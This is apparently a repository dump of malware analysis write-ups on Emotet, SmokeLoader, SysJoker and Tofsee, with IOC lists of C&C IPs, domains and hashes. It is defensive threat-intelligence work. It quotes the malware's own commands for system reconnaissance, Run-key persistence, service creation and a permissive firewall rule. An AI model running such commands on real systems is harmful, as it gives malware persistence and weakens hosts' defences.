![image](https://user-images.githubusercontent.com/91592110/165128128-1d3fd203-18f4-407d-b00b-461d3a4a3512.png) 46 | 47 | After this, we will see that the dll will try to contact a list of C&C servers. 48 | 49 | ![image](https://user-images.githubusercontent.com/91592110/165128479-8e606913-199b-41f1-adec-fc5831206764.png) 50 | 51 | If we look at the origin of all the addresses it tries to contact, we can see that it has servers in most of America, Europe and Asia, among others. 52 | 53 | ![7](https://user-images.githubusercontent.com/91592110/165128942-55d00be4-4d06-4b20-84b3-41377f135589.png) 54 | 55 | How long will they continue to exploit Emotet? Who knows... 56 | 57 | # _IOC 58 | 59 | ### _Download Emotet 60 | 61 | ``` 62 | fccatinsaat.com 63 | freemanylaluz.com 64 | futaba.youchien.net 65 | fabulouswebdesign.net 66 | freewebsitedirectory.com 67 | dominionai.org 68 | ``` 69 | 70 | ### _C&C 71 | 72 | ``` 73 | 159.203.141.156 74 | 79.143.187.147 75 | 189.232.46.161 76 | 51.91.76.89 77 | 119.193.124.41 78 | 176.104.106.96 79 | 1.234.21.73 80 | 82.165.152.127 81 | 167.172.253.162 82 | 153.126.146.25 83 | 216.158.226.206 84 | 103.75.201.2 85 | 188.44.20.25 86 | 101.50.0.91 87 | 159.65.88.10 88 | 176.56.128.118 89 | 72.15.201.15 90 | 203.114.109.124 91 | 212.237.17.99 92 | 192.99.251.50 93 | 50.30.40.196 94 | 173.212.193.249 95 | 189.126.111.200 96 | 195.154.133.20 97 | 58.227.42.236 98 | 46.55.222.11 99 | 45.176.232.124 100 | 195.201.151.129 101 | 151.106.112.196 102 | 209.250.246.206 103 | 131.100.24.231 104 | 1.234.2.232 105 | 164.68.99.3 106 | 51.91.7.5 107 | 167.99.115.35 108 | 5.9.116.246 109 | 185.8.212.130 110 | 31.24.158.56 111 | 45.142.114.231 112 | 79.172.212.216 113 | 45.118.135.203 114 | 146.59.226.45 115 | 178.79.147.66 116 | 159.8.59.82 117 | 158.69.222.101 118 | 50.116.54.215 119 | 196.218.30.83 120 | 129.232.188.93 121 | 45.118.115.99 122 | 51.254.140.238 123 | 209.126.98.206 124 | 107.182.225.142 125 | 134.122.66.193 126 | 185.157.82.211 127 | 110.232.117.186 128 | 197.242.150.244 129 | 103.43.46.182 130 | 212.24.98.99 131 | 201.94.166.162 132 | 104.131.11.205 133 | 138.197.109.175 134 | 187.84.80.182 135 | 206.189.28.199 136 | 160.16.142.56 137 | 183.111.227.137 138 | 103.132.242.26 139 | 103.70.28.102 140 | 172.104.251.154 141 | ``` 142 | 143 | 144 | > :t-rex: [vc0=Rexor](https://github.com/vc0RExor) :detective: 145 | -------------------------------------------------------------------------------- /SmokeLoader/SmokeLoader.md: -------------------------------------------------------------------------------- 1 | # _Overview 2 | 3 | _SmokeLoader is a malware that generally acts as a backdoor and is commonly used as a loader for other malware. Attributed to the criminal group Smoky Spider, a group that uses SmokeLoader and Sasfis, loader and downloader respectively. SmokeLoader has been used as a bot in infrastructures and contains strong evasion capabilities as well as Anti-Analysis, Anti-VM and Anti-DBG techniques._ 4 | 5 | # _Technical Analysis 6 | 7 | SmokeLoader appears on systems usually through phishing, although it can be loaded by other PUP/PUA or malware. The main execution will revolve around a document that will spawn the SmokeLoader which will run, in most of its versions, a version of itself in a suspended state to inject code, after which it will execute an _explorer.exe_ that it will inject again in order to perform the malicious C&C actions or download other files using legitimate software. 8 | 9 | ![image](https://user-images.githubusercontent.com/91592110/187239221-5968e49f-3684-4094-8de3-8ac597abaa7b.png) 10 | 11 | The samples that have been found have in most cases been detected as packed, due to the high level of entropy contained in their sections. 12 | 13 | ![image](https://user-images.githubusercontent.com/91592110/187241303-3a2dffb6-1847-44a0-9bd1-a31e73c1d1bb.png) 14 | 15 | At the initial point, we see how it tries to load libraries in RunTime, something really useful since it prevents us from being able to discern its intentions if we perform a basic static analysis, so it will obtain new functionalities during its execution. 16 | 17 | ![image](https://user-images.githubusercontent.com/91592110/187241924-4a02b64a-3d96-4eb3-a82d-d14aba87eecd.png) 18 | 19 | In some of the techniques used to hinder the analysis, such as code obfuscation, we find different hidden calls, as well as abuses of RET to reach calls that we will not see statically. 20 | 21 | ![image](https://user-images.githubusercontent.com/91592110/187242148-842d7a21-3762-435d-9dd8-483f42b86854.png) 22 | 23 | As mentioned above, it fetches libraries during runtime and is dedicated to resolving APIs that it could use later on 24 | 25 | ![image](https://user-images.githubusercontent.com/91592110/187242691-ca58c58d-59ce-49bb-b3f4-9ea0698c57bc.png) 26 | 27 | At all times, it has control over what is running on the machine, as it subsequently performs various Anti-Vm and Anti-dbg techniques, so having all running processes mapped is always a good technique. 28 | 29 | ![image](https://user-images.githubusercontent.com/91592110/187243583-2b3d9f16-1b2e-437c-a94d-91caed2f5f0c.png) 30 | 31 | After this, it starts loading APIs that will serve it moments later, in which we will see a routine that will be loading from memory and using LoadLibrary + GetProcAddress 32 | 33 | ![image](https://user-images.githubusercontent.com/91592110/187243708-dd1c7f62-6843-4936-927d-d8ba5a2e5034.png) 34 | 35 | APIs: 36 | 37 | ``` 38 | CreateFileA 39 | CreateWindowExA 40 | CreateProcessA 41 | WriteProcessMemory 42 | ResumeThread 43 | DefWindowProcA 44 | NtWriteVirtualMemory 45 | RegisterClassExA 46 | GetStartupInfoA 47 | SetThreadContext 48 | GetCommandLineA 49 | PostMessageA 50 | VirtualAllocEx 51 | CloseHandle 52 | VirtualAlloc 53 | VirtualFree 54 | VirtualProtectEx 55 | ExitProcess 56 | GetMessageExtraInfo 57 | WaitForSingleObject 58 | NtUnmapViewOfSection 59 | MessageBoxA 60 | ReadProcessMemory 61 | GetThreadContext 62 | WriteFile 63 | GetModuleFileNameA 64 | GetFileAttributesA 65 | WinExec 66 | GetMessageA 67 | ``` 68 | 69 | Once it has the libraries, APIs and processes controlled, it creates a process in suspended state, for this it uses CreateProcessInternalA that will call CreateProcessInternalW entering 0x04 in dwCreationflags to create the process in suspended state. 70 | 71 | ![image](https://user-images.githubusercontent.com/91592110/187244113-325b1c03-7162-452c-9851-42abbfe8d174.png) 72 | 73 | ![image](https://user-images.githubusercontent.com/91592110/187244358-62cc2b27-184a-4ccd-aadf-4a239460eb55.png) 74 | 75 | ![image](https://user-images.githubusercontent.com/91592110/187244373-7c8eaa92-3f6e-4ec6-93df-9e95f94efc93.png) 76 | 77 | Once the process is created in a suspended state, it proceeds to introduce the binary inside the previously spawned process, which, through ProcessHollowing, will unmap data from itself, to write the binary inside, this is usually done through ZwUnmapViewOfSection + VirtualAlloc + ZwWriteVirtualMemory, once introduced into the memory of the process in suspension, it will stop being suspended and will execute it, so the memory file will be detonated. 78 | 79 | ![image](https://user-images.githubusercontent.com/91592110/187244878-b65d2548-6a5b-40c2-bfe1-962619351f4d.png) 80 | 81 | [ The binary extracted from memory, which will inject explorer.exe, is very interesting, we will follow soon :) :detective: ] 82 | 83 | # _IOC 84 | 85 | ### _SHA256 86 | ``` 87 | Ebdebba349aba676e9739df18c503ab8c16c7fa1b853fd183f0a005c0e4f68ae 88 | D618d086cdfc61b69e6d93a13cea06e98ac2ad7d846f044990f2ce8305fe8d1b 89 | Ee8f0ff6b0ee6072a30d45c135228108d4c032807810006ec77f2bf72856e04a 90 | 6b48d5999d04db6b4c7f91fa311bfff6caee938dd50095a7a5fb7f222987efa3 91 | B961d6795d7ceb3ea3cd00e037460958776a39747c8f03783d458b38daec8025 92 | 02083f46860f1ad11e62b2b5f601a86406f7ee3c456e6699ee2912c5d1d89cb9 93 | 059d615ce6dee655959d7feae7b70f3b7c806f3986deb1826d01a07aec5a39cf 94 | 5318751b75d8c6152d90bbbf2864558626783f497443d4be1a003b64bc2acbc2 95 | 79ae89733257378139cf3bdce3a30802818ca1a12bb2343e0b9d0f51f8af1f10 96 | F92523fa104575e0605f90ce4a75a95204bc8af656c27a04aa26782cb64d938d 97 | ``` 98 | 99 | ### _IP 100 | 101 | ``` 102 | 216.128.137.31 103 | 8.209.71.53 104 | ``` 105 | 106 | ### _Domains 107 | 108 | ``` 109 | host-file-host6[.]com 110 | host-host-file8[.]com 111 | fiskahlilian16[.]top 112 | paishancho17[.]top 113 | ydiannetter18[.]top 114 | azarehanelle19[.]top 115 | quericeriant20[.]top 116 | xpowebs[.]ga 117 | venis[.]ml 118 | tootoo[.]ga 119 | eyecosl[.]ga 120 | bullions[.]tk 121 | mizangs[.]tw 122 | mbologwuholing[.]co[.]ug 123 | quadoil[.]ru 124 | ``` 125 | 126 | > :t-rex: [vc0=Rexor](https://github.com/vc0RExor) :detective: 127 | 128 | -------------------------------------------------------------------------------- /SysJoker/A new Backdoor: SysJoker.md: -------------------------------------------------------------------------------- 1 | # _Overview 2 | 3 | _SysJoker is a backdoor which appeare for the first time at the beginning of 2022 whose power resides in being cross-platform. Its main objective is to install itself in our computer and perform espionage and/or data theft tasks. Currently it has not yet been attributed to any group or campaign._ 4 | 5 | # _What we see at a glance 6 | 7 | At this sample written on C++ will be several mentioned functionalities before 8 | 9 | SHA256: 10 | ``` 11 | 1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c 12 | ``` 13 | 14 | ![exeinfo](https://user-images.githubusercontent.com/91592110/158830817-202c7da0-5bbe-463a-b3b8-de53991d2cb9.png) 15 | 16 | We can see at a glance how a powershell is executed after the binary, which will have different utilities and will be used in different points 17 | 18 | ![ps1](https://user-images.githubusercontent.com/91592110/158831357-e02fa45e-021e-4443-8de8-2a4f3ab1f556.png) 19 | 20 | ![ps2](https://user-images.githubusercontent.com/91592110/158831379-0b64a19d-52c7-4295-9247-653f430fae5a.png) 21 | 22 | ![ps3](https://user-images.githubusercontent.com/91592110/158831388-60d0d35c-fef3-48ea-8290-5d2fad118fd6.png) 23 | 24 | # _Analysis 25 | 26 | Seeing how it works from the beginning, SysJoker will perform a folder creation, usually in ProgramData or in subfolders of AppData in which it will leave a copy of itself named after legitimate software, in this case using igfx, in its legitimate variant related to _Intel Graphics Common User Interface_. 27 | 28 | _Execution flow:_ 29 | 30 | ``` 31 | . 32 | ├── (Parentprc) SysJoker.exe 33 | | ├─ (Childprc) Powershell.exe 34 | | ├─ (Childcmd) powershell.exe copy '' '' 35 | 36 | ``` 37 | ![0](https://user-images.githubusercontent.com/91592110/158833215-43fe28c7-bc4b-4e18-9fed-9821493086e9.png) 38 | 39 | After this, we will see how the dropped file is executed in the previously mentioned folder, and it will obtain different important elements of the equipment such as: MAC, OS and Network. It will save it in different .txt files, which will be in the same path where the copy is running. As we can see, it sometimes uses the internal WMIC tool to get certain data and dump it. 40 | 41 | _Commandlines:_ 42 | 43 | ``` 44 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt' 45 | 46 | "C:\Windows\System32\Wbem\WMIC.exe" path win32_physicalmedia get SerialNumber 47 | 48 | "C:\Windows\System32\cmd.exe" /c wmic OS get Caption, CSDVersion, OSArchitecture, Version / value > "C:\ProgramData\SystemData\tempo1.txt" && type "C:\ProgramData\SystemData\tempo1.txt" > "C:\ProgramData\SystemData\tempo2.txt 49 | 50 | "C:\Windows\System32\cmd.exe" /c wmic nicconfig where 'IPEnabled = True' get ipaddress > "C:\ProgramData\SystemData\tempi1.txt" && type "C:\ProgramData\SystemData\tempi1.txt" > "C:\ProgramData\SystemData\tempi2.txt 51 | ``` 52 | 53 | ![1](https://user-images.githubusercontent.com/91592110/158833441-25716da1-ce42-48df-a8a8-7f06c6e994e8.png) 54 | 55 | 56 | After the previous step, the files will be deleted since the information will be hardcoded before being sent to a C&C server, this information will be dumped to a supposed dll, which, we can see that it is simply coded information. 57 | 58 | ![2](https://user-images.githubusercontent.com/91592110/158833531-ed22f635-7a93-4ba1-9406-68c69f103f6a.png) 59 | 60 | ![exeinfo2](https://user-images.githubusercontent.com/91592110/158833555-b4aac916-5406-4746-ae15-d68f32096295.png) 61 | 62 | After this, it will persist on the computer by adding the previously copied file to the registry key _CurrentVersion\Run_ with which it will get execution again in a forced way (/F) every time we start the system. 63 | 64 | _Commandline:_ 65 | 66 | ``` 67 | REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F 68 | ``` 69 | 70 | ![3](https://user-images.githubusercontent.com/91592110/158833676-78210d1a-bf1c-483d-91e5-9d3b9988bed7.png) 71 | 72 | As for communications against C&C, it has been seen to use different domains _drive.google.com_ or _github_ to make it more difficult to detect traffic and perform rule creation. In short, the Sysjoker does not bring anything relatively new, but it has a quite characteristic methodology that makes it quite recognizable. 73 | 74 | > :t-rex: [vc0=Rexor](https://github.com/vc0RExor) :detective: 75 | 76 | -------------------------------------------------------------------------------- /SysJoker/Readme: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Tofsee/Tofsee backdoor.md: -------------------------------------------------------------------------------- 1 | # _Overview 2 | 3 | _Tofsee is a malware used for mass campaigns, which does not have an associated group or actor. It has gone through different phases, but has generally been used to create Botnets or SpamBots, as well as mining actions. The starting point of Tofsee is usually a Loader or an email using the SpearPhishing technique that will launch the malware. It has been in all its stages a really worked malware, with code obfuscations, packaged samples, anti-analysis techniques, which led to a backdoor to perform minings taking advantage of the botnet features or to perform Spam._ 4 | 5 | # _Technical Anlysis 6 | 7 | After the loader or phishing we would see Tofsee running on the computer, an overview of how the current versions of Tofsee work can be seen in the following schematic diagram 8 | 9 | ![image](https://user-images.githubusercontent.com/91592110/183301004-460ecac2-de36-4c90-bbb2-3d665c0ef7fb.png) 10 | 11 | The actual way of working of the current versions usually has different variations, but in essence it works similar, after the execution of Tofsee, a copy of itself is created in SysWow64 (or equivalent), which then moves to temporary folders, usually the sample of the temporary folder and the one of SysWow, will not have the same name. After this, it creates a service using sc.exe, usually with a name and/or description related to elements of the network. Later, it makes modifications in the FireWall to add an svchost to a completely permissive rule, this svchost is the one that would have injected in the process. After this execution, you will be able to perform your tasks within an svchost which, observing processes would be difficult to discern also having permission to send and receive all types of traffic through the Firewall and with a service that allows us to launch the backdoor as if it were a system service. 12 | 13 | ``` 14 | . 15 | ├── (Parentprc) Tofsee.exe 16 | | ├─ (Childprc) (Moved | Dropped) .exe 17 | | ├─ (Childprc) Netsh/cmd/sc 18 | | ├─ (Childprc) (Injected) Svchost 19 | | ├─ (Net) C&C 20 | 21 | ``` 22 | 23 | A large number of samples have been reviewed to narrow down the current versions of tofsee as much as possible, an example of what we would see when viewing one of them in PEstudio would be as follows 24 | 25 | ![image](https://user-images.githubusercontent.com/91592110/183301107-e6b9b874-27fc-411b-ad82-5e0c9733b75d.png) 26 | 27 | At the first step, we see how it launches a copy of itself to SysWow64 which it then moves to a temporary folder, the commands used, launched by cmd.exe are the following: 28 | 29 | ``` 30 | "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ 31 | "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\" C:\Windows\SysWOW64\ 32 | ``` 33 | ![image](https://user-images.githubusercontent.com/91592110/183301167-0903a506-59a7-4041-ba14-eb01d0254566.png) 34 | 35 | After having two files in different locations, it uses one of them (SysWow location) to make the modifications in the defenses, as well as the persistence using a service. For the creation of the service, we can see that it creates with own start a service "Wifi Support", as we had commented before, usually it is habitual that it is related to something of the network, trying to avoid to be found. 36 | 37 | The command used, launched by sc.exe is as follows: 38 | 39 | ``` 40 | "C:\Windows\System32\sc.exe" create binPath= "C:\Windows\SysWOW64\\ /d\"C:\Users\\Desktop\"" type= own start= auto DisplayName= "wifi support" 41 | ``` 42 | ![image](https://user-images.githubusercontent.com/91592110/183301204-2e5da69d-f222-4250-bc7d-05f83ef8ffb0.png) 43 | 44 | Once it has created the service, It has ensured that the backdoor will remain on the computer launched as another service and going completely unnoticed, so need to modify FireWall rules to prevent its communications to the outside from having any problems. For this, it launches through netsh.exe the creation of a rule that allows all the traffic for a svchost process (the one that is injected). 45 | 46 | The command used is: 47 | 48 | ``` 49 | "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes 50 | ``` 51 | 52 | ![image](https://user-images.githubusercontent.com/91592110/183301250-cc434e70-68f1-43dc-8a5e-ceda1fffb134.png) 53 | 54 | ![image](https://user-images.githubusercontent.com/91592110/183301252-ea93585f-2a51-470d-a9ce-0333cdbfb5e5.png) 55 | 56 | In addition, we can see, that it enters it in exclusions in registry key, being the path with random name the place where it was previously self-dropped 57 | 58 | ![image](https://user-images.githubusercontent.com/91592110/183301277-258e0f5c-1482-40a7-b250-570810ddf4e4.png) 59 | 60 | ![image](https://user-images.githubusercontent.com/91592110/183301279-22ef33e1-124b-4206-b19f-7cd6ef08f88b.png) 61 | 62 | While all the above processes are being launched, we have the other binary in a temporary path performing other actions, such as injecting an svchost, the same one we have seen that has been introduced in exclusions and a rule has been created in the FireWall. During a normal execution, we would find an svchost without a parent process, which, after looking at it in depth, we would see that it is another of the binaries launched by Tofsee by locating it by PID 63 | 64 | ![image](https://user-images.githubusercontent.com/91592110/183301407-cf23b299-1b0c-4ff6-9cf9-5d2320efb97b.png) 65 | 66 | This binary is the other binary that Tofsee worked with and had previously moved to %temp%. 67 | 68 | ![image](https://user-images.githubusercontent.com/91592110/183301423-29bbdd7f-d5ba-4712-8265-ca6ce4abf1ec.png) 69 | 70 | Once in this phase, you have the Tofsee functionalities inside a legitimate process, with persistence created and with fully open traffic on the FireWall that you will use to connect to a C&C server. 71 | 72 | The most common destinations in the campaigns used at recent months are the following (Russian or Chinese IPs/domains are commonly used by Tofsee): 73 | 74 | ``` 75 | svartalfheim.top 76 | lazystax.ru 77 | ``` 78 | 79 | ![image](https://user-images.githubusercontent.com/91592110/183301459-911f0845-42e9-4bfa-9db7-ff8feb352951.png) 80 | 81 | 82 | # _IOC 83 | 84 | ### _C&C 85 | 86 | ``` 87 | svartalfheim.top 88 | lazystax.ru 89 | ``` 90 | 91 | ### _SHA256 92 | 93 | ``` 94 | 9ff3eb5bac86aef0116488ac380f9d7ea15d27f9d580462fcf3612293525f50f 95 | 2f5b289a8dcb26ed9389a49687e513f162ed3145469a5cb90f0aab45c699c3d9 96 | 22179b5cece54e42dbc249c5112994e0e760c2435f3547579d04d19882b79b03 97 | 3c38e00f572800dfdcf676a141e4b98903977368f8870cd29221b3320b640ed4 98 | E64afadba25eededfb3259f10671cf5551e53341e13702489a7c334fcf6514b0 99 | A96edd53cb70eb51f8bb9fbd0b9d0777e6b65c5203fb3b73229431b49da155e4 100 | F6bf44f37a819ce566e217cf94a3de32a404cf303700f82788b44f9fde8e0937 101 | Ddaada491b8cf4d1187cb01078c5f3fd167e76c324d3e0db83753a6922e739f4 102 | 1dc4c40d2a971bcfba32e21ab5ff5c127aa1cea66a72176b753c8c9d0d54fc25 103 | 820b43708e064c1a6eb1eeb411b011e900fcd162afdd55d077ef619777a9d12b 104 | D5a45f5fbe4d0679d208908a1282e6675456cf565b427d886cab0b2fdf92c21b 105 | 5a3ac08cf1bdee0dfe30bcd306c5613a7526eda1a1eaec00d76f3681b25f8694 106 | 5b3ed204bf794afc4d32c750e74a219c4730b2a96ded36c6ea2753581158ab11 107 | 5b5cae86c3a28fc013bce2e327c424168e212220b8b284714bbccf9926e7cb6e 108 | 5bb633fef2f50ca5ec2302ea37800f68c76596ef770c394e706f57a5d655feac 109 | 5bcc5563c17c7805651b50c509b6862ef554948336fbec1f99f9059a65d6b703 110 | 5c3b9c929cac14277c3f810b57a487a6093470e3b4fd56ac65ab2d3f6b4e9959 111 | 460a0c6a2f32fd82774d45670a9110f046b3fbf4093d17ca378b0f4f63de6e0e 112 | 93ead5f86a3eda573a375afebaa3651c2f48c4381e657a0819176a79843749cb 113 | 40ca993b529a245ebf6ad5deb1b11beffc24a8ddd5c908e341ae886a2df3351c 114 | C526be053d1279fd214ac204c23ce79ee034af6d6213fff69f31a19a53f5bba2 115 | 46359601942519b156cf35e91a252abb4381c695ec053216efc948729d2eb2ab 116 | 6644c412c44c8686437b1fa3ad6d5698c1071ac133ccd060b1062df37b081f1e 117 | 9c2a732f02510a2524d1ffb52ea6c96a93c3ee6bb3ad777181596f370c030da3 118 | C5a593ba8d3006cbd55a0b41436e055eeed50a122b2a0f8d28fa30624565dc48 119 | B10c82428c7284ce3ab78edeaf6582fcbc93e3a647559fba49bdc1589df13ab9 120 | A5aaf507390c8ab2bd12849e68a740b19c97e5bfdfd3459ca0f120490fee3fd0 121 | e248be07f11c33ff0af5bdd36d2bca1ae9c392223bd5b14c600b15637e02c5f7 122 | a06f640a6317ffeaed88cf7a08c8680a4bc4abe69286bce68f03c19ba319e103 123 | ``` 124 | 125 | ### _IP 126 | 127 | ``` 128 | 31.41.244.126 129 | 31.41.244.127 130 | 31.41.244.128 131 | 43.231.4.7 132 | 46.173.223.212 133 | 98.136.96.76 134 | 111.121.193.242 135 | ``` 136 | 137 | > :t-rex: [vc0=Rexor](https://github.com/vc0RExor) :detective: 138 | --------------------------------------------------------------------------------